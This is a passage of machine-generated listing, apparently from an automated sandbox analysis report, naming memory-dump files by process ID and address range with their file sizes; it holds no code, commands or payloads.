                • memory/4720-283-0x0000000000000000-mapping.dmp
                • memory/4720-303-0x0000000004360000-0x0000000004372000-memory.dmp
                  Filesize

                  72KB

                • memory/4724-202-0x0000000000000000-mapping.dmp
                • memory/4804-380-0x0000000000000000-mapping.dmp
                • memory/4804-428-0x0000000000000000-mapping.dmp
                • memory/4804-523-0x0000000000000000-mapping.dmp
                • memory/4804-521-0x0000000000000000-mapping.dmp
                • memory/4804-519-0x0000000000000000-mapping.dmp
                • memory/4804-517-0x0000000000000000-mapping.dmp
                • memory/4804-515-0x0000000000000000-mapping.dmp
                • memory/4804-513-0x0000000000000000-mapping.dmp
                • memory/4804-511-0x0000000000000000-mapping.dmp
                • memory/4804-509-0x0000000000000000-mapping.dmp
                • memory/4804-507-0x0000000000000000-mapping.dmp
                • memory/4804-505-0x0000000000000000-mapping.dmp
                • memory/4804-503-0x0000000000000000-mapping.dmp
                • memory/4804-501-0x0000000000000000-mapping.dmp
                • memory/4804-499-0x0000000000000000-mapping.dmp
                • memory/4804-497-0x0000000000000000-mapping.dmp
                • memory/4804-495-0x0000000000000000-mapping.dmp
                • memory/4804-367-0x0000000002CC0000-0x0000000002CC1000-memory.dmp
                  Filesize

                  4KB

                • memory/4804-368-0x0000000000000000-mapping.dmp
                • memory/4804-369-0x0000000002D80000-0x0000000002D81000-memory.dmp
                  Filesize

                  4KB

                • memory/4804-370-0x0000000000000000-mapping.dmp
                • memory/4804-372-0x0000000000000000-mapping.dmp
                • memory/4804-374-0x0000000000000000-mapping.dmp
                • memory/4804-376-0x0000000000000000-mapping.dmp
                • memory/4804-378-0x0000000000000000-mapping.dmp
                • memory/4804-493-0x0000000000000000-mapping.dmp
                • memory/4804-382-0x0000000000000000-mapping.dmp
                • memory/4804-384-0x0000000000000000-mapping.dmp
                • memory/4804-386-0x0000000000000000-mapping.dmp
                • memory/4804-388-0x0000000000000000-mapping.dmp
                • memory/4804-390-0x0000000000000000-mapping.dmp
                • memory/4804-392-0x0000000000000000-mapping.dmp
                • memory/4804-394-0x0000000000000000-mapping.dmp
                • memory/4804-396-0x0000000000000000-mapping.dmp
                • memory/4804-398-0x0000000000000000-mapping.dmp
                • memory/4804-400-0x0000000000000000-mapping.dmp
                • memory/4804-402-0x0000000000000000-mapping.dmp
                • memory/4804-404-0x0000000000000000-mapping.dmp
                • memory/4804-406-0x0000000000000000-mapping.dmp
                • memory/4804-408-0x0000000000000000-mapping.dmp
                • memory/4804-410-0x0000000000000000-mapping.dmp
                • memory/4804-412-0x0000000000000000-mapping.dmp
                • memory/4804-414-0x0000000000000000-mapping.dmp
                • memory/4804-416-0x0000000000000000-mapping.dmp
                • memory/4804-418-0x0000000000000000-mapping.dmp
                • memory/4804-420-0x0000000000000000-mapping.dmp
                • memory/4804-422-0x0000000000000000-mapping.dmp
                • memory/4804-424-0x0000000000000000-mapping.dmp
                • memory/4804-426-0x0000000000000000-mapping.dmp
                • memory/4804-491-0x0000000000000000-mapping.dmp
                • memory/4804-430-0x0000000000000000-mapping.dmp
                • memory/4804-432-0x0000000000000000-mapping.dmp
                • memory/4804-434-0x0000000000000000-mapping.dmp
                • memory/4804-436-0x0000000000000000-mapping.dmp
                • memory/4804-438-0x0000000000000000-mapping.dmp
                • memory/4804-440-0x0000000000000000-mapping.dmp
                • memory/4804-442-0x0000000000000000-mapping.dmp
                • memory/4804-444-0x0000000000000000-mapping.dmp
                • memory/4804-446-0x0000000000000000-mapping.dmp
                • memory/4804-448-0x0000000000000000-mapping.dmp
                • memory/4804-450-0x0000000000000000-mapping.dmp
                • memory/4804-452-0x0000000000000000-mapping.dmp
                • memory/4804-454-0x0000000000000000-mapping.dmp
                • memory/4804-456-0x0000000000000000-mapping.dmp
                • memory/4804-458-0x0000000000000000-mapping.dmp
                • memory/4804-460-0x0000000000000000-mapping.dmp
                • memory/4804-462-0x0000000000000000-mapping.dmp
                • memory/4804-465-0x0000000000000000-mapping.dmp
                • memory/4804-467-0x0000000000000000-mapping.dmp
                • memory/4804-469-0x0000000000000000-mapping.dmp
                • memory/4804-471-0x0000000000000000-mapping.dmp
                • memory/4804-473-0x0000000000000000-mapping.dmp
                • memory/4804-475-0x0000000000000000-mapping.dmp
                • memory/4804-477-0x0000000000000000-mapping.dmp
                • memory/4804-479-0x0000000000000000-mapping.dmp
                • memory/4804-481-0x0000000000000000-mapping.dmp
                • memory/4804-483-0x0000000000000000-mapping.dmp
                • memory/4804-485-0x0000000000000000-mapping.dmp
                • memory/4804-487-0x0000000000000000-mapping.dmp
                • memory/4804-489-0x0000000000000000-mapping.dmp
                • memory/4876-289-0x0000000000000000-mapping.dmp
                • memory/4916-334-0x0000000004C70000-0x0000000004C94000-memory.dmp
                  Filesize

                  144KB

                • memory/4916-332-0x0000000004C40000-0x0000000004C63000-memory.dmp
                  Filesize

                  140KB

                • memory/4916-364-0x00000000072B0000-0x00000000072B1000-memory.dmp
                  Filesize

                  4KB

                • memory/4916-273-0x0000000000000000-mapping.dmp
                • memory/4916-287-0x00000000049F0000-0x00000000049F1000-memory.dmp
                  Filesize

                  4KB

                • memory/4916-277-0x0000000000190000-0x0000000000191000-memory.dmp
                  Filesize

                  4KB

                • memory/4916-276-0x0000000070E50000-0x000000007153E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/4992-113-0x0000000000000000-mapping.dmp
                • memory/4992-125-0x0000000000B70000-0x0000000000B71000-memory.dmp
                  Filesize

                  4KB

                • memory/4992-206-0x0000000005B40000-0x0000000005B4D000-memory.dmp
                  Filesize

                  52KB

                • memory/4992-190-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
                  Filesize

                  4KB

                • memory/4992-189-0x0000000005950000-0x0000000005A00000-memory.dmp
                  Filesize

                  704KB

                • memory/4992-121-0x0000000070500000-0x0000000070BEE000-memory.dmp
                  Filesize

                  6.9MB

                • memory/5028-209-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/5028-212-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/5028-210-0x000000000043FCC3-mapping.dmp